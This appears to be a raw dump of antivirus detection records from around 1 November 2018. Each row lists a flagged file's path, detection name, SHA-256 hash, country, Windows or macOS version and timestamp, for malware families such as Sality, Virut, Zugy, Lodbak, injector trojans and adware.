  Row(detection=Row(filename='avscan-20181102-054856-f54b2c43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054856-F54B2C43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054857-f5f8208b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054857-F5F8208B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052613-c8fc0c60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052613-C8FC0C60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:46:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054115-e2abc0a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054115-E2ABC0A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053853-8df1dadd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053853-8DF1DADD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053334-cfb8f50b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053334-CFB8F50B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055753-3568c920', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055753-3568C920', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062113-780f929d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062113-780F929D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052651-df564e0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052651-DF564E0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061540-b10eb2ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061540-B10EB2EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051911-cd0f66d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051911-CD0F66D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050639-0d23434b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050639-0D23434B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053323-c93a3b40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053323-C93A3B40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061557-bb83dd30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061557-BB83DD30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054427-552bdb93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054427-552BDB93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062151-8e460e53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062151-8E460E53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062203-959156d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062203-959156D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050611-fca062d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050611-FCA062D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053348-d80f155a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053348-D80F155A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055905-6076d948', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055905-6076D948', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052015-f33927f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052015-F33927F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:26:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:43:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:19:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='november.scr', filepath='D:\\DATA_SHARE\\audit\\november\\november.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:18:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iexplore.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\iexplore.exe', filesize=860000, name='W32/Sality.AT.#M1.#R1'), hash='2640e0da790df7b5d8227b5605dd12de5f0f1c8830c57bd0c9cbcd957a67278f', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233030-bfe30f07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-233030-BFE30F07', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='song-เพลงฝรั่ง.exe', filepath='E:\\music\\song-เพลงฝรั่ง\\song-เพลงฝรั่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='44c9767aecd78f23bc19bd584861d8f7171e48da92c57a6b9cb355b993a2ea11', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160200-fe627ccb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160200-FE627CCB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\RPG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:05:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='november.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\GAJI RPG\\NOVEMBER\\NOVEMBER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155956-e983f392', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155956-E983F392', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T02:55:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='don gia 2006 tinh dong nai.exe', filepath='D:\\Du Lieu Cu Truoc day\\luu tru o D\\d\\USB 11-7-2011\\hitosoft\\HitoSoft\\Don gia 2006 Tinh Dong Nai.exe', filesize=1280000, name='HEUR/AGEN.1027222.#M1.#R1'), hash='13aa34f67d38cf9710af046bef57183eb168c839efa0655ce2348ff43eb737bb', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T08:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_--__-_--___----_-_-_-_-__----__-_-__--_____-_----_---_--_._--__-_--___----_-_-_-_-__----__-_-__--_____-_----_---_--_', filepath='G:\\\xa0\\_--__-_--___----_-_-_-_-__----__-_-__--_____-_----_---_--_._--__-_--___----_-_-_-_-__----__-_-__--_____-_----_---_--_', filesize=5708000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='503bacde0142b68240ec4799386bdbdfc918e1b38b97dad28f3d09f73c0b3564', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='backup.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\28-02-2013 BACKUP\\BACKUP.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000079ce', filepath='C:\\Windows\\Temp\\c8a8db62-6e13-477e-b972-5a3522bb3be9\\tmp00000371\\tmp000079ce', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='49bbab85a2e8d32e23827bada887e2f38157dcb2847ef4ecf4c11d999aec4d0a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.15.1046.10613\\AdAwareService.exe', parentsize=630976, timestamp='2018-11-01T16:05:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g100canon.exe', filepath='E:\\DCIM\\g100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\WinMiner\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\WinMiner\\WinMiner.exe', parentsize=4506640, timestamp='2018-11-01T07:31:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z9d.trd.3pp5.zjn.ztptlvt.ztlvljr.n15f.3z7zttb3', filepath='I:\\\xa0\\z9D.TrD.3PP5.Zjn.zTptlVt.ztlVLjR.n15f.3Z7zTTB3', filesize=22156000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='574b855b91fe420c719ff87bac49513b25a0e459b23a1d9ed9a4e56847e6acf2', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi7142.tmp', filepath='\\\\?\\C:\\Windows\\Installer\\MSI7142.tmp', filesize=3072000, name='Adware/DealPly.ME.22.#M1.#R1'), hash='9b61cf90b3b8cd80f89ae004b3862efce6b7c141aa8ddf2e5f5633396fd15d2f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optional extensions.exe', filepath='E:\\programe\\Adobe Photoshop CS2 9.0 Final\\Goodies\\Optional Plug-Ins\\Photoshop Only\\Optional Extensions\\Optional Extensions.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='7a8726869171e4c384a7e1beebcddcf2f66be4ddf00c3eb0521d33aa0c670bdf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='bbd4091a14df0b36659c02cc3d781d16be0c6a17572212c2413a513955db0eb7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:17:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trz6375.tmp', filepath='\\\\?\\C:\\Program Files\\PBWH10V91C\\trz6375.tmp', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:30:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142905-2451a320', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142905-2451A320', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='\\\\?\\C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:21:24Z'), dt=datetime.date(2018, 11, 1)),
